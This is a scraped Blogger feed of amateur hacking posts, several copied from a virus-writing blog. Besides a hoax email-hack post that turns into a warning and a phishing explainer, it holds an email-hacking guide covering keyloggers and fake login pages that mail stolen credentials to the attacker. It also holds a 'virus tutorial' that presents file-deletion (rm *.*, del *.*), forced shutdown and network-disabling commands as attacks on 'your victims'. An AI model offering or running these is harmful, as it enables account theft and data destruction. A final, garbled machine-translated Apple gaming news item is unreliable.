Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-27411671008659098312015-01-22T04:53:00.000-08:002018-04-11T22:21:02.561-07:00Hacking VictimsJust read along if you wish to hack any email that asks you the security question in case you forgot the password. This makes use of a bug present in most email(expect a few like earthlymail and electronicmail ) .There are several sites that claim to give you password by just sending an email but in that you also need to give your password.This is a fake thing you finally end up getting your id hacked.<br />
<br />
This is a genuine method and is only for educational purpose. If you hack you are at your own.We will trick the server in thinking that the details(DOB/Securtity question & answer) you gave are true. Please read the enire post before you begin as you need to done somethings before you start composing.One important thing If you are hacking a Yahoo account compose/send mail from a Yahoo account only. If you dont have one then create it and then send.<br />
<br />
Just compose a mail called FORGOT PASSWORD(all in caps)<br />
<br />
Now you need to send this mail to ret_pass@**** .com(replace *** with Live/ Hotmail/MSN) OR retrieve_pass@**** .com(replace **** with Aol/AIM/Yahoo)<br />
<br />
In the subject field type the following id:$your victims's id$ <br />
Here is the trick we need to convince the server that the details that you give are the details of that id<br />
<br />
secque: $give your security question$ (no ? after the question. In case it has a space for eg: "What is your pet" give it as what%20is%20your%pet i.e replace any space by %20)<br />
<br />
For <b>Yahoo</b> it's security<br />
<br />
secans: $give your security answer$ (Again here also if any space then replace the space by %20 For eg: if your answer is "Google Helper" give it as google%20helper)<br />
<br />
For <b>Yahoo</b> it's security & for Aol/Aim it's secan<br />
<br />
sdob: %$dob of your id$% No % needed for Yahoo <br />
You may also be needed to give your Pincode as spin .<br />
<br />
Once you send the mail the server will will not know what to do. The securtiy details of the id from which you sent mail are fully correct but id mentioned is something else. So instead of giving your password it gives password of the id metioned.<br />
<br />
You should either get the password in 10-30 min or an error will be generated. I think by now you might have understood why i asked to send for the same mail provider.If not then the reason is how will MSN know details of your AOL mail.<br />
<br />
And one more imprtant thing this method has a 95% success rate if you dont get up from your dream. This means that this post is all Bogus. You can never hack anyone by this method.This was just to show how easy you get fooled . I decided to make it look as complicated as possible to as trick.And i excluded earthly mail to give a indirect warning sign so that clever minds might be able to catch it)<br />
<br />
If you didnt fall for it then great else boo go start writing snail/postal mail , web is not for you. Remember it's not easy to hack.Never follow any method given online.Also dont give your id to any who claims to give you the method one coz once you give your spam mail box would be always full.<br />
<br />
SO the moral is if you are too greedy you end up loosing every thing that you have.For true methods visit the <a href="http://www.viruswriting.blogspot.com/search/label/hacking">hacking section(click here)</a>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-5587755944995724112012-06-15T01:02:00.000-07:002018-04-11T22:21:12.418-07:00Hacking Through Links<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">This is called as phishing. Though this method is popular in mails. Mails contain link that show some thing but point to some other site all together some thing like this .</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><a href="http://www.goooogle.com/" style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;">http:/www.google.com /</a><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">This will direct you to goooole.com instead to google.com. Also note the change in link the actual link has to be http:// (second "/").</span></span><br />
<span style="background-color: white;"><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">This could take you into some other site orkut.com link. Another popular thing is "http://www.okrut.com/GLogin". Did found any change. No. See again. The spelling of orkut.</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">This will take you into some page that looks same as original but is different site all together. So if you click on a hyperlink that asks you to login check the site's address however familar it looks. So be careful.</span></span><br />
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;"><br /></span></span>
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">Source : </span></span><a href="http://viruswriting.blogspot.com/">http://viruswriting.blogspot.com/</a>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-18175151459902057922012-06-15T00:58:00.003-07:002018-04-11T22:21:46.191-07:00Hack Email ( yahoo / msn / aol / gmail and lot more)<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">Most of us are interested in hacking some one's email(mostly buddies or family members). If you want to know how to "Hack email" by both the safe(no offense way) and the "you go to jail" way then read along. all are simple but effective ways to hack emails . Solts start hacking emails</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">There are several ways you can achieve this let me show you all.</span></span><br />
<ul style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;">
<li><span style="background-color: white;"><b><span style="font-size: medium;">Read email without hacking</span> </b>-- This is 100% soafe . If you are simply inerested in reading someone's email then you can achive this wihout hacking. Check out this post on <a href="http://viruswriting.blogspot.com/2008/03/read-emails-without-hacking.html" target="_blank">Hacking emials: Read emails </a>. The problem with this method is you cant read email of secure mails like Yahoo, Gmail, msn, Aol or of most commonly used mail providers. This is best for reading mails of organisations that maintain their own server wich are not secure and of mails send to small websites/blogs via forms that may not be sent securely</span></li>
</ul>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"></span></div>
<ul style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;">
<li><span style="background-color: white;"><span style="font-size: medium;"><b>Using password recovery </b></span>-- This may have tough requirements but is the best method.If you wnat to get some one's password you can use a password recovery software. This too is partially safe as the softwares are not illegal but if you misuse it 's a crime. You can check out this post on<a href="http://viruswriting.blogspot.com/2008/08/hack-any-passwords-yahoomsnaolgoogle.html">hacking using password recovry softwares</a></span></li>
</ul>
<ul style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;">
<li><span style="background-color: white;"><span style="font-size: medium;">Using Keylogger</span> -- A keyloggger is a software that records all you keystrokes. It is used by admins to moniter the system since it records all keystrokes it will also record sensitive info. As above using keylogger is n ot illegal but misusing the result is crime. (more details comming soon)</span></li>
</ul>
<ul style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;">
<li><span style="background-color: white;"><span style="font-size: medium;">Phishing/Craeting fake pages </span> -- You can trick some one into entering his info at a fake page created by you. This is punishable offense and you will get at least 1 year sentence. Jsut creat a clone copy of that page with a form intsead of a login box that mails the details to you. Check out this post on<a href="http://www.googleopedia.com/2008/02/create-fake-pages.html">creating fake pages</a></span></li>
</ul>
<span style="background-color: white;"><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">This article is purely for knowledge sake and we dont intent to spread havoc. None of us have ever hacked into anyone's account expect may be for our own.</span></span>
<br />
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;"><br /></span></span>
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">Source : </span></span><a href="http://viruswriting.blogspot.com/">http://viruswriting.blogspot.com/</a>Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-50149843706743710392012-06-15T00:56:00.004-07:002018-04-11T22:23:29.725-07:00IP Gives It All<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">Most people wonder how do websites come to know of your location from IP.Now you too can find out.Forget users you can even sneak up on websites. Just enter IP/URL/mailid and vola all the details of are given.</span></span><br />
<div style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;">
<span style="background-color: white;"><br /><br /><span style="font-size: 20px;">Just visit </span><a href="http://www.visualroute.com/" target="_blank"><span style="font-size: 20px;">visualroute</span></a> . This has some great tools that will help you. You can enter IP/URL/Domain name and much more.<br /></span><br />
<div style="text-align: left;">
<span style="background-color: white;">Here is a pic of what it can do <span style="font-size: 12px;">(</span><span style="font-size: 13px;">click on pic for a larger image). It gives your location. who is your internet provider, how you are connected to him.</span></span></div>
<div style="text-align: center;">
<span style="background-color: white;"><a href="http://4.bp.blogspot.com/_Y2hjuHzA7_c/Rw9IEFNyQ6I/AAAAAAAAAHc/5GnfnjrD0mo/s1600-h/visualroute.gif"><img alt="" border="0" height="320" id="BLOGGER_PHOTO_ID_5120390536300217250" src="https://4.bp.blogspot.com/_-MqhqlmwYAI/SArKdDZbQOI/AAAAAAAABu0/LBk7usJ1Sf0/s320/vroute.JPG" style="border-width: 0px; padding: 5px;" width="320" /></a></span></div>
<span style="background-color: white;"><a href="http://4.bp.blogspot.com/_Y2hjuHzA7_c/Rw9IEFNyQ6I/AAAAAAAAAHc/5GnfnjrD0mo/s1600-h/visualroute.gif"><span style="font-size: 13px;">(click for larger image)</span></a></span><br />
<span style="background-color: white;"><br />This software costs about 60$. What if you dont want to buy the software you can use the lite version. This give only how the data is sent., how are you connected yo him</span><br />
<div style="text-align: center;">
<span style="background-color: white;"><a href="http://3.bp.blogspot.com/_Y2hjuHzA7_c/Rw9Gy1NyQ5I/AAAAAAAAAHU/7NADlVugw_Q/s1600-h/trace.PNG"><img alt="visual route" border="0" height="320" id="BLOGGER_PHOTO_ID_5120389140435846034" src="https://4.bp.blogspot.com/_-MqhqlmwYAI/SArKJDZbQNI/AAAAAAAABus/rxvT54Lx4MA/s320/vroute1.JPG" style="border-width: 0px; padding: 5px;" width="320" /></a></span></div>
<span style="background-color: white;"><a href="http://3.bp.blogspot.com/_Y2hjuHzA7_c/Rw9Gy1NyQ5I/AAAAAAAAAHU/7NADlVugw_Q/s1600-h/trace.PNG"><span style="font-size: 13px;">(click for larger image)</span></a><br /><br /><br />What if you dont want to download any thing. then there are some online tools</span><br />
<ul>
<li><span style="background-color: white;">Samspade.org</span></li>
<li><span style="background-color: white;">net4domain.com</span></li>
<li><span style="background-color: white;">visualware.com and more.</span></li>
</ul>
<div>
Source : <a href="http://viruswriting.blogspot.com/">http://viruswriting.blogspot.com/</a></div>
</div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-39869923566317320052012-06-15T00:53:00.000-07:002018-04-11T22:23:48.933-07:00Virus Code Tutorial<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">Virus code can be coded using several language. The best being c or vbs or dos. Today I teach some basic virus codings. I will be using c, dos and alp/asm(assembly language).These is a very simple Virus coding tutorial just a beginners guide</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">First alp/asm</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span class="Apple-style-span" style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; font-weight: bold;">back: add c,b</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span class="Apple-style-span" style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; font-weight: bold; text-align: left;">loop back</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float.</span></span><br />
<span style="background-color: white;"><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">Now lets try to create a simple Linux virus in c.</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span class="Apple-style-span" style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; font-weight: bold; text-align: left;">system("poweroff");</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare.</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">let's see one more linux virus of the same type</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span class="Apple-style-span" style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; font-weight: bold; text-align: left;">system("rm *.*");</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc.</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">Lets see the same codes for windows.</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">To delete all files in windows using dos/batch progtraming will be</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span class="Apple-style-span" style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; font-weight: bold; text-align: left;">del *.*</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">and the code of the shutdown virus will be just </span><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; font-weight: bold; text-align: left;">shutdown</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">Now lets disable Internet</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><b style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;">ipconfig /release</b><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span class="Apple-style-span" style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; font-weight: bold; text-align: left;">echo You Internet Been HACKED!</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">What if you change the extension of a file. It becomes useless.Now let's rename a few file.</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span class="Apple-style-span" style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; font-weight: bold; text-align: left;">rename(old_file_name_with_path,newname");</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">Now what you can do with this left up to you.Just use your brain and you will make out it's potential.</span><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><br style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;" /><span style="font-family: "trebuchet ms" , sans-serif; font-size: 16px; text-align: left;">These are very simple virus just a beginners guide. Just check out the virus codes section for more complex and full fledged Virus coding tutorial. Please dont misuse these virus codes in c</span></span><br />
<ul style="font-family: 'Trebuchet MS', sans-serif; font-size: 16px; text-align: left;">
<li><span style="background-color: white;"><a href="http://viruswriting.blogspot.com/2008/06/vbsredlofa-htmlredlofa-code.html" target="_blank">Html virus </a>-- vbs</span></li>
<li><span style="background-color: white;"><a href="http://viruswriting.blogspot.com/2008/02/muhaha-orkut-virus-code.html" target="_blank">Orkut Virus </a>-- vbs</span></li>
<li><span style="background-color: white;"><a href="http://viruswriting.blogspot.com/2008/02/clone-virus-code-in-c.html" target="_blank">Clone virus</a> -- c/c++</span></li>
<li><span style="background-color: white;"><a href="http://viruswriting.blogspot.com/2008/02/virus-code-in-cc.html" target="_blank">Doom virus</a> -- c/c++</span></li>
<li><span style="background-color: white;"><a href="http://viruswriting.blogspot.com/2008/05/black-wolf-virus-code.html" target="_blank">Black Wolf virus</a> -- c/c++</span></li>
<li><span style="background-color: white;"><a href="http://viruswriting.blogspot.com/2008/02/virus-wrting-1.html" target="_blank">Disable input device</a> -- c/c++</span></li>
<li><span style="background-color: white;"><a href="http://viruswriting.blogspot.com/2008/06/sasser-virus-code.html" target="_blank">Sasser Virus</a> -- Assembly language</span></li>
</ul>
<div style="text-align: left;">
<span style="font-family: "trebuchet ms" , sans-serif;">Source : </span><a href="http://viruswriting.blogspot.com/2008/08/virus-coding-tutorial.html">http://viruswriting.blogspot.com/2008/08/virus-coding-tutorial.html</a></div>
Smarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1tag:blogger.com,1999:blog-4589865437637964814.post-36884775720307803212009-05-14T01:38:00.000-07:002018-04-11T22:24:05.776-07:00Apple Start a glance Video Game Market<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidGdvfXwoxm7TRilQ-Dp3OSOpfJPm2y9RtAQC6FDiFgPgfDf1DKvJqa5whRlxi3OzSOdSBut4Pqzv9t0GBcLgQYULAOJvI69wfoTJ1DyTaH-o2tdDBqqWY_Q5q1GVxcZoval5UpAviT1c/s1600-h/logo-apple.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5335597687230409442" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidGdvfXwoxm7TRilQ-Dp3OSOpfJPm2y9RtAQC6FDiFgPgfDf1DKvJqa5whRlxi3OzSOdSBut4Pqzv9t0GBcLgQYULAOJvI69wfoTJ1DyTaH-o2tdDBqqWY_Q5q1GVxcZoval5UpAviT1c/s320/logo-apple.jpg" style="cursor: hand; cursor: pointer; float: left; height: 116px; margin: 0 10px 10px 0; width: 100px;" /></a><br />
Has not been quite satisfied with the success in the notebook market and the mobile phone, Apple began to look the video game market. Uniquely, in the habit outside Apple who often do Outsource content and hardware products to the other party, this time for Apple to seriously use their own product gamenya. To realize ambisinya, Apple to recruit some staff of experts in the computer graphics and game consoles. Does this foreshadow the birth of the new console machine outside the playstation and XBOX in the future?<br />
<strong>Better Staff for Better Results</strong><br />
In recent months Apple actively recruit qualified staff and computer graphics consoles such as Bob Drebin and Raja Koduri. Both the Chief Technology Officers for AMD graphics products. And in early May this, Apple re-recruit Richard Teversham, Director of Senior XBOX Insights and Strategy Division at Microsoft Corp. Interactive Entertainment. Apple has demonstrated seriousness and agresivitasnya in the development of technology, especially technology and graphics Semiconductor. Years ago this company mengakusisi PA Semi, a company that produces Power-architecture microprocessors, chip multi-core processors saver with 65nm manufacturing.<br />
<br />
Possible Akusisi Electronic Arts<br />
<br />
Guy Adami, Managing Director of Drakon Capital mengisyarakatkan that Apple are working close to Electronic Arts, the second-largest game publisher in the world (after the Nintendo) to mengakusisi company. Electronic Arts is known as a PC game publisher that uses Microsoft Direct3D programming interface that is not supported by the platform owned by Apple. That way, when akusisi this happens, Apple must develop their own content and konsolnya game with Electronic Arts to manage distribution channels and marketing. Interesting disimak whether the ambition to seize the market Apple computer and console games will be realized in the future and the dream lover of the Mac to play games with game-high quality graphics on their Macs.<br />
Learn More... <a href="http://www.amazon.com/gp/product/B0013FJBX8?ie=UTF8&tag=moduonli-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=B0013FJBX8">Apple MacBook Pro MB470LL/A 15.4-Inch Laptop (2.4 GHz Intel Core 2 Duo Processor, 2 GB DDR3 RAM, 250 GB Hard Drive, Slot Loading SuperDrive)</a><img alt="" border="0" src="http://www.assoc-amazon.com/e/ir?t=moduonli-20&l=as2&o=1&a=B0013FJBX8" height="1" style="border: none !important; margin: 0px !important;" width="1" /><br />
<br />
Source: X-bit Labs NewsSmarthttp://www.blogger.com/profile/00649496828163204212noreply@blogger.com1